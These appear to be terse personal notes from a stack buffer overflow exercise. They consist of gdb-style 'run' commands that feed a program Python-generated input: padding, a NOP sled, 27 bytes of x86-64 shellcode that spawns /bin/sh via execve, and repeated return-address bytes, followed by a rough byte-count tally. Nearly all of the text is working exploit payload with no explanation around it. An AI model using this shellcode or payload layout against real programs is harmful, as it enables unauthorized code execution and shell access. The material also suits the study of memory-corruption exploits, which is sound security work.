- run $(python -c 'print("\x41" * 103)')
-\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

- run $(python -c 'print("\x90" * 40 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x51\x51\x51" * 10)'


64
=
27 bytes of shell code
+ 13 no ops?
+ 24 (6 * 4 bytes return address)


run $(python -c 'print("\x90" * 13 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x51\x51\x51" * 6)')

